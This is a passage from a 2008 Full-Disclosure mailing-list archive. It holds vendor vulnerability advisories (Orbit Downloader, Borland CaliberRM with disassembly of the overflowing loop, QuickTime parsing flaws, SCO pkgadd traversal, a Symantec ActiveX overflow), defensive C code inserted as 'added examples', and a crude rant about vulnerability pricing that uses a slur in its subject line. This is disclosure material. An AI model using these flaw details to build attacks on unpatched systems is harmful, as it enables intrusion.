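 * conversion failure as an error. Returns WCHARs written, or -1.
 * No terminator is needed: the caller passes nCount to DrawTextW. */
static int widen_safe(const char *src, size_t len, WCHAR *dst, size_t dst_wchars)
{
    if (len > dst_wchars || len > (size_t)INT_MAX)
        return -1;                                /* would not fit: reject, do not truncate */
    int n = model_mb_to_wc(src, (int)len, dst, (int)dst_wchars);
    return (n == 0 && len != 0) ? -1 : n;
}

/* Would a URL of url_len bytes be accepted by the hardened path into a
 * buffer of the real size? 1 = converted, 0 = rejected. The URL is a
 * constructed run of 'A's; a static array stands in for the stack frame. */
static int url_fits(size_t url_len)
{
    static WCHAR buf[BUF_WCHARS];
    char *url = malloc(url_len ? url_len : 1);
    if (!url)
        return 0;
    memset(url, 'A', url_len);
    int n = widen_safe(url, url_len, buf, BUF_WCHARS);
    free(url);
    return n >= 0;
}
```

With the count in WCHARs, a 4096-byte URL is the largest that converts; 4097 bytes is rejected instead of spilling past the buffer, which is exactly the threshold the advisory gives.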
*References*

[1] http://www.orbitdownloader.com
[2] http://msdn2.microsoft.com/en-us/library/ms776413(VS.85).aspx

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9UkByNibggitWa0RAuXFAJ4v5Fgp5RNTdK/7uOpzenSArY4jUQCeKV4D
4aeviH5oHhjdIRFmDLVVUx0=
=v9yp
-----END PGP SIGNATURE-----

From xploitable@gmail.com Thu Apr 3 22:38:49 2008
From: xploitable@gmail.com (n3td3v)
Date: Thu, 3 Apr 2008 22:38:49 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <004e01c89593$4cec60f0$336b880a@softpro.corp>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp>
Message-ID: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>

On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff wrote:
> Regarding the particular person in question, I'll defer to others who know him (or her, or they, or whomever) better than I do. Instead, I'll say that, generally, on lists like FD, there is a minority of out-spoken personalities who sadly support the stereotypical hacker persona: condescending egoists who are socially inept and emotionally charged when discussing topics that relate to their knowledge domain. That's unfortunate, since the broader IT security community is poorly represented due to attention-seeking zealots.
>
> Regarding the idea of "outlawing security conference spamming," I'd say the literal idea of outlawing cross-posts to multiple security mailing lists is a bad idea. The idea that the legislature should write into law legislation that reduces our freedom in such a sense is a slippery slope borne of emotionalism and narrowness. What else should the government do to curtail our freedoms? I tend to side with libertarian types (though I don't call myself a "libertarian" un-qualified) on what the government should do and what they should not do. And micro-managing security mailing lists is something they should not do. It's a bad idea and would make a dreadful precedent.

Full-Disclosure is meant to be about free source, not making money. I'm against people who make money coming on the mailing lists; it's commercial spam. We can't allow this to continue. Here is what I don't like:

- Come to our conference - profit... buy our ticket, get a MacBook prize.
- Hacking challenge prize - profit... they give you $5000 and sell it to the vendor for a lot more.
- Train to use our software - profit... overpriced training for software... not interested.

On the issue of how much a vulnerability is worth, the prices are not regulated. We need regulation into how much a vulnerability costs, because the prices right now are wild. We need to take vulnerability pricing off the black market and onto a legitimate central website for selling vulnerabilities, or cash rewards for disclosing a vulnerability to a particular company or organisation. I don't like sites like Digital Armaments which, when I visited it, the content and answers they gave were questionable, and people have complained about Digital Armaments in the past. It's time to get pricing regulated and defined, so everyone knows who's being joe jobbed and who isn't. Can someone post to full-disclosure a price list of what they think a buffer overflow should be worth etc, and we can vote if we agree.
So what I'm calling for is someone to post up a hacker's price list per vulnerability type. XSS/SQL should be worth something as well, so Morning_Wood can buy milk and a newspaper in the mornings after he's taken care of his wood. Sorry I've ended this e-mail with slightly off-topicness, but I do think pricing needs to be defined.

We can't dress up cash prizes/contests as something else as well. If a website is offering a $5,000 reward for a vulnerability, we need to know if we're being ripped off with the cash reward and how much can be potentially made after it's sold on. Robert Lemos even talked about vulnerability pricing (http://www.securityfocus.com/news/11510) when Pwn2Own was on, and even the Pwn2Own cash reward might not be enough money, compared to what a vulnerability *should* be worth, and taking into consideration how much profit CanSecWest make overall from people attending the conference. So you take into consideration how much a vulnerability should be worth, then the added worth because it's a security conference of how much should be added on to counter the profit being made by the event. A vulnerability should be worth more if it's disclosed at a security conference than if it's bought privately, because you've got to take in profit and free advertising to calculate.

However, to round off, we can't allow the mailing lists to turn into a vulnerability marketplace. Full-disclosure should be for free stuff, and other websites and mailing lists can be set up for *money making schemes and auctions*. We shouldn't allow the money makers directly to market X... if a link is put on Full-Disclosure by a member of the public on the fly then that's ok, but I think it's cheeky for the particular conference, contest runner or software trainer to be on the list themselves spamming everyone, for a profiteering agenda. You mention cross-posting; that's not the issue here. It's the people making the money posting to make the money that offends me so much.
And not even the lonely hacker offends me who posts "I've got a vulnerability for sale for X". I don't mind that on Full-Disclosure, but what I do mind is if it's a company or organisation doing it that is directly the ones making the money via vulnerability for sale, prize contest, security conference or train to use our software!!! That's the height of spam I just think is utterly wrong and unethical on any scale of acceptability. If a lonely hacker who works in a supermarket has a vulnerability to sell, I'm all for it being posted on full-disclosure, but not the big money conferences, prize hacking contests and software training guys. I come under the bracket of supermarket worker with nothing much going for me in life, so I should be allowed to sell a vulnerability on what's meant to be a mailing list for non-profit disclosure.

If we tolerate the money making schemes much longer, eventually full-disclosure will be awash with conference, training, cash prize spam, etc once everyone realises the full value of vulnerabilities and the huge amounts of money to be made from setting up a cash prize contest, the huge amounts of money to be made from setting up a security conference and the huge amounts of money to be made from training people to use your hax0r software.

You will find it easy to shout me down and say n3td3v's an idiot, but wait till the vulnerability market really takes off and the prices of vulnerabilities are properly defined and regulated; you're going to see a huge increase in commercial spam on the mailing lists, like the full-disclosure mailing list. So we've got to define what's fair play e-mail and what's a company or organisation blatantly profiteering with X method of extracting money out of people and using skilled hackers to make money, and to promote a security conference, training etc.
All the best,
n3td3v

From labs-no-reply@idefense.com Thu Apr 3 22:43:27 2008
From: labs-no-reply@idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 17:43:27 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.02.08: Borland CaliberRM StarTeam Multicast Service Buffer Overflow Vulnerability
Message-ID: <47F54F7F.3070500@idefense.com>

iDefense Security Advisory 04.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 02, 2008

I. BACKGROUND

Borland CaliberRM is an enterprise software requirements management system. It is part of Borland's distributed development and deployment solution. For more information about Borland CaliberRM, please visit the following website.

http://www.borland.com/us/products/caliber/index.html

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Borland Software Corp.'s CaliberRM enterprise software requirements management system could allow attackers to execute arbitrary code with SYSTEM level privileges.

This vulnerability exists in the StarTeam Multicast Service component (STMulticastService). This service is implemented using the HTTP protocol. The vulnerable function, PGMWebHandler::parse_request, is shown below.

.text:003AA15D                 call    PGMWebHandler::parse_request(char const *,uint,char *,uint,http_request_info_t &)
...
.text:003AA35E loc_3AA35E:
.text:003AA35E                 mov     al, [ebx]
.text:003AA360                 cmp     al, 0Ah
.text:003AA362                 mov     [edx], al       ; edx points to the stack, overflowable because of the loop
.text:003AA364                 jnz     loc_3AA4EF
...
.text:003AA36A                 mov     byte ptr [edx+1], 0
.text:003AA36E                 mov     al, byte ptr [esp+618h+lbuff]
.text:003AA372                 cmp     al, 0Dh
.text:003AA374                 jz      loc_3AA509
...
.text:003AA4F0 loc_3AA4F0:
.text:003AA4F0                 mov     eax, [esp+618h+count]
.text:003AA4F4                 mov     ecx, [esp+618h+req_len]
.text:003AA4FB                 inc     ebx
.text:003AA4FC                 inc     eax
.text:003AA4FD                 cmp     eax, ecx
.text:003AA4FF                 mov     [esp+618h+count], eax
.text:003AA503                 jl      loc_3AA35E      ; loop back up

While searching for the standard 0x0a0d that ends HTTP requests, a loop copies attacker supplied data byte by byte into a fixed-size stack buffer. The loop is bounded only by the request length, never by the size of the destination buffer. If a large enough request is sent, the return address, SEH pointers, and other stack data are overwritten.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code with SYSTEM level privileges. In order to exploit this vulnerability an attacker would have to send malicious data to the STMulticastService service listening on TCP port 3057.

The StarTeam Multicast service is not installed by default with CaliberRM 2006. The user must enable MPX Events and the StarTeam Message Broker option during the installation process.

IV. DETECTION

iDefense confirmed that the trial version of Borland CaliberRM 2006 (file version 9.0.809.000) is vulnerable. The actual vulnerable component is StarTeam Multicast Service 6.4. Other Borland products containing the StarTeam Multicast Service component, such as Borland StarTeam, may also be affected.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, administrators can disable the Multicast Service monitoring port. For more information consult Borland's Knowledge Base at the following URL.

http://support.borland.com/kbshow.php?q=29083

VI. VENDOR RESPONSE

Borland Software Corp. has not responded to repeated inquiries regarding this vulnerability. iDefense Labs confirmed that the current version (Borland CaliberRM 2008) still contains the vulnerable code. However, the monitoring port appears to be disabled in a default installation.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0311 to this issue.
This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

03/20/2007  Initial vendor notification
03/20/2007  Initial vendor response
08/06/2007  Second vendor notification
11/02/2007  Third vendor notification
04/02/2008  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
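The parse_request loop in section II above stores each byte first and tests for the terminator second, with the request length as its only bound. The following is an added example in portable C, not Borland's code: it mirrors the loop's arithmetic without performing the out-of-bounds write, and sets a bounded reader beside it that stops at the destination size. The buffer size LINE_CAP, the function names and the constructed request lines are assumptions of this example; the real buffer size is not stated in the advisory.

```c
/* Added example modelling the CaliberRM parse_request loop (CVE-2008-0311).
 * Not Borland's code; LINE_CAP is an assumed size for the model. */
#include <stddef.h>
#include <string.h>

#define LINE_CAP 256   /* assumed destination size; the real one is not given */

/* Mirrors the vulnerable loop's arithmetic without writing anything:
 * returns how many bytes the unbounded copy would store before stopping,
 * i.e. up to and including the first '\n', or req_len if there is none.
 * Any result >= the destination size means the stack buffer is overrun. */
static size_t unbounded_copy_bytes(const char *req, size_t req_len)
{
    size_t count = 0;
    while (count < req_len) {
        count++;                      /* mov [edx], al happens before the test */
        if (req[count - 1] == '\n')   /* cmp al, 0Ah: stop only after the store */
            break;
    }
    return count;
}

/* Hardened reader: bounded by the destination, requires the terminator to
 * arrive before the buffer fills, and never writes past out[cap-1].
 * Returns the line length excluding CR/LF and NUL-terminates out, or -1
 * when the line is too long or has no terminator within req_len. */
static int read_request_line(const char *req, size_t req_len, char *out, size_t cap)
{
    for (size_t i = 0; i < req_len; i++) {
        if (i + 1 >= cap)             /* keep room for the NUL; reject instead of spilling */
            return -1;
        out[i] = req[i];
        if (req[i] == '\n') {
            size_t n = i;
            if (n > 0 && out[n - 1] == '\r')
                n--;                  /* accept CR LF as well as bare LF */
            out[n] = '\0';
            return (int)n;
        }
    }
    return -1;                        /* unterminated request line */
}

/* Accept/reject decision for a request's first line against the model
 * buffer: 1 = a bounded parser would take it, 0 = it would be refused. */
static int request_line_ok(const char *req, size_t req_len)
{
    char line[LINE_CAP];
    return read_request_line(req, req_len, line, sizeof line) >= 0;
}
```

For a normal request line the two functions agree; for a 300-byte line with no early LF the unbounded count exceeds LINE_CAP, which is the condition the advisory describes, while the bounded reader refuses the line before touching anything beyond the buffer.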
From zdi-disclosures at 3com.com Thu Apr 3 22:53:12 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:53:12 -0500
Subject: [Full-disclosure] ZDI-08-017: Apple QuickTime Kodak Encoding Heap Overflow Vulnerability
Message-ID:

ZDI-08-017: Apple QuickTime Kodak Encoding Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-017
April 3, 2008

-- CVE ID:
CVE-2008-1020

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the quicktime.qts library responsible for parsing Kodak encoded images. A lack of proper error checking can result in a heap based buffer overflow leading to arbitrary code execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Ruben Santamarta of Reversemode.com

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com.

From zdi-disclosures at 3com.com Thu Apr 3 22:55:25 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:55:25 -0500
Subject: [Full-disclosure] ZDI-08-019: Apple QuickTime Malformed VR obji Atom Parsing Memory Corruption Vulnerability
Message-ID:

ZDI-08-019: Apple QuickTime Malformed VR obji Atom Parsing Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-019
April 3, 2008

-- CVE ID:
CVE-2008-1022

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5954.
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must open a malicious file.

The specific flaw exists in the parsing of the QuickTime VR 'obji' atom. When the size of the atom is set to 0, a stack overflow condition occurs resulting in the execution of arbitrary code.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
From zdi-disclosures at 3com.com Thu Apr 3 22:50:24 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:50:24 -0500
Subject: [Full-disclosure] ZDI-08-015: Apple QuickTime Clipping Region Heap Overflow Vulnerability
Message-ID:

ZDI-08-015: Apple QuickTime Clipping Region Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-015
April 3, 2008

-- CVE ID:
CVE-2008-1017

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5931. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the quicktime.qts library. The vulnerability resides in the component's parsing of 'crgn' atoms.
A lack of proper sanity checks on the region size field can result in a heap based buffer overflow leading to arbitrary code execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sanbin Li
From zdi-disclosures at 3com.com Thu Apr 3 22:51:23 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:51:23 -0500
Subject: [Full-disclosure] ZDI-08-016: Apple QuickTime MP4A Atom Parsing Heap Corruption Vulnerability
Message-ID:

ZDI-08-016: Apple QuickTime MP4A Atom Parsing Heap Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-016
April 3, 2008

-- CVE ID:
CVE-2008-1018

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 3377. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists in the parsing of the QuickTime Channel Compositor atom. When the movie file contains a malformed 'chan' atom, a heap corruption occurs resulting in the execution of arbitrary code.

-- Vendor Response:
Apple has issued an update to correct this vulnerability.
More details can be found at:
http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
From zdi-disclosures at 3com.com Thu Apr 3 22:49:25 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:49:25 -0500
Subject: [Full-disclosure] ZDI-08-014: Apple Quicktime Multiple Opcode Memory Corruption Vulnerabilities
Message-ID:

ZDI-08-014: Apple Quicktime Multiple Opcode Memory Corruption Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-08-014
April 3, 2008

-- CVE ID:
CVE-2008-1019

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must open a malicious file.

The specific flaw exists in quickTime.qts while parsing corrupted .pict files. The module contains a vulnerable memory copy loop which searches for a terminator value. When this value is changed or omitted, a heap corruption occurs allowing the execution of arbitrary code.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* bugfree
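The 'obji' size-0 case and the 'crgn' region-size case in the advisories above both come down to an atom header whose declared size is used before it is checked against the data actually present. As an added example that is not Apple's or ZDI's code, a defensive reader for the QuickTime atom header (big-endian 32-bit size, four-byte type, optional 64-bit extended size when the size field is 1); the sample atoms, function names and the exact set of rejected sizes are constructed here.

```c
/* Added example: validate a QuickTime atom header before trusting its size.
 * Not Apple's parser; sample atoms below are constructed, not from real files. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

struct atom_hdr {
    char     type[5];      /* four-character code, NUL-terminated */
    size_t   header_len;   /* 8, or 16 when the 64-bit extended size is used */
    uint64_t payload_len;  /* bytes after the header, already bounded by 'avail' */
};

enum {
    ATOM_OK        =  0,
    ATOM_TRUNCATED = -1,   /* fewer bytes present than the header itself needs */
    ATOM_BAD_SIZE  = -2,   /* declared size smaller than its own header */
    ATOM_OVERSIZED = -3    /* declared size larger than the enclosing data */
};

static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static uint64_t rd64(const uint8_t *p)
{
    return ((uint64_t)rd32(p) << 32) | rd32(p + 4);
}

/* Parse one atom header from buf (avail bytes). Every size path is checked
 * against avail before the caller is allowed to index into the payload. */
int parse_atom_header(const uint8_t *buf, size_t avail, struct atom_hdr *out)
{
    uint64_t size;

    if (avail < 8)
        return ATOM_TRUNCATED;
    size = rd32(buf);
    memcpy(out->type, buf + 4, 4);
    out->type[4] = '\0';
    out->header_len = 8;

    if (size == 1) {                 /* 64-bit extended size follows the type */
        if (avail < 16)
            return ATOM_TRUNCATED;
        size = rd64(buf + 8);
        out->header_len = 16;
    } else if (size == 0) {          /* "extends to end of enclosing data" */
        size = avail;                /* bound it by what we were actually given */
    }

    if (size < out->header_len)      /* payload length would wrap below zero */
        return ATOM_BAD_SIZE;
    if (size > avail)                /* claims more bytes than were supplied */
        return ATOM_OVERSIZED;

    out->payload_len = size - out->header_len;
    return ATOM_OK;
}

/* Constructed sample atoms. Returns 0 when every case is handled as intended,
 * otherwise the number of the first failing case. */
int demo_atom_checks(void)
{
    struct atom_hdr h;
    static const uint8_t crgn[20]  = { 0,0,0,20, 'c','r','g','n',
                                       0,0,0,0, 0,0,0,0, 0,0,0,0 };
    static const uint8_t obji0[24] = { 0,0,0,0, 'o','b','j','i',
                                       0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0 };
    static const uint8_t bad[8]    = { 0,0,0,4, 'o','b','j','i' };
    static const uint8_t big[8]    = { 0,0,0x10,0, 'c','h','a','n' };
    static const uint8_t ext[24]   = { 0,0,0,1, 'm','d','a','t',
                                       0,0,0,0, 0,0,0,24, 0,0,0,0, 0,0,0,0 };

    /* well-formed 'crgn': 8-byte header, 12-byte payload */
    if (parse_atom_header(crgn, sizeof crgn, &h) != ATOM_OK || h.payload_len != 12)
        return 1;
    /* 'obji' with size 0: payload is what remains, never "0 minus header" */
    if (parse_atom_header(obji0, sizeof obji0, &h) != ATOM_OK || h.payload_len != 16)
        return 2;
    /* size 4 is smaller than the 8-byte header it describes */
    if (parse_atom_header(bad, sizeof bad, &h) != ATOM_BAD_SIZE)
        return 3;
    /* 'chan' claiming 4096 bytes when only 8 are present */
    if (parse_atom_header(big, sizeof big, &h) != ATOM_OVERSIZED)
        return 4;
    /* extended size: 16-byte header, 8-byte payload */
    if (parse_atom_header(ext, sizeof ext, &h) != ATOM_OK ||
        h.header_len != 16 || h.payload_len != 8 || strcmp(h.type, "mdat") != 0)
        return 5;
    return 0;
}

int main(void)
{
    int rc = demo_atom_checks();
    printf("atom header checks: %s\n", rc == 0 ? "ok" : "FAILED");
    return rc;
}
```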
From zdi-disclosures at 3com.com Thu Apr 3 22:54:32 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 3 Apr 2008 16:54:32 -0500
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability
Message-ID:

ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-018
April 3, 2008

-- CVE ID:
CVE-2008-1021

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime 7.4.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5998. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the parsing of QuickTime files that utilize the Animation codec. A lack of proper length checks can result in a heap based buffer overflow leading to arbitrary code execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT1241

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-04-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
From labs-no-reply at idefense.com Thu Apr 3 23:47:32 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 18:47:32 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.03.08: SCO UnixWare pkgadd Directory Traversal Vulnerability
Message-ID: <47F55E84.3000903@idefense.com>

iDefense Security Advisory 04.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 03, 2008

I.
BACKGROUND

SCO UnixWare is a UNIX operating system that runs on many OEM platforms. The pkgadd command is used to install packages on the system. More information about the product is available from the URL shown below.

http://www.sco.com/products/unixware714/

II. DESCRIPTION

Local exploitation of a directory traversal vulnerability within the pkgadd program distributed with SCO Group Inc's UnixWare operating system allows attackers to gain root privileges.

By setting an environment variable to a value containing directory traversal sequences, such as "../", an attacker can cause the program to create or append to arbitrary files on the system.

III. ANALYSIS

Exploitation allows attackers to gain root privileges. Access to execute arbitrary shell commands is required to exploit this issue. By targeting specific system files, an attacker can add accounts or otherwise facilitate privilege escalation.

IV. DETECTION

iDefense confirmed the existence of this vulnerability within version 7.1.4 of UnixWare with all patches available as of August 27th, 2007 installed. Previous versions are suspected to be vulnerable.

V. WORKAROUND

Changing the permissions of the pkgadd command to only allow root to execute this program will prevent exploitation of this vulnerability.

# chmod 700 /usr/sbin/pkgadd

VI. VENDOR RESPONSE

SCO has addressed this vulnerability by releasing patches. For more information, consult their advisory at the following URL.

http://www.sco.com/support/update/download/release.php?rid=324

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0310 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

09/04/2007 Initial vendor notification
10/30/2007 Initial vendor response
04/03/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.
From labs-no-reply at idefense.com Thu Apr 3 23:55:51 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 18:55:51 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.02.08: Symantec Norton Internet Security 2008 ActiveX Control Buffer Overflow Vulnerability
Message-ID: <47F56077.4000008@idefense.com>

iDefense Security Advisory 04.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 02, 2008

I. BACKGROUND

Norton Internet Security 2008 is a system security suite that offers protection from spyware, viruses, identity theft, spam, and malicious network traffic. More information can be found on the vendor's site at the following URL.

http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2008

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in an ActiveX control installed by Symantec Norton Internet Security 2008 could allow for the execution of arbitrary code.
Norton Internet Security 2008 installs the following ActiveX control which is registered as safe for scripting:

Clsid: 3451DEDE-631F-421c-8127-FD793AFC6CC8
File: C:\PROGRA~1\COMMON~1\SYMANT~1\SUPPOR~1\SymAData.dll
Version: 2.7.0.1

This control contains an exploitable stack based buffer overflow.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code with the privileges of the currently logged in user. In order for exploitation to occur, an attacker would have to lure a vulnerable user to a malicious web site.

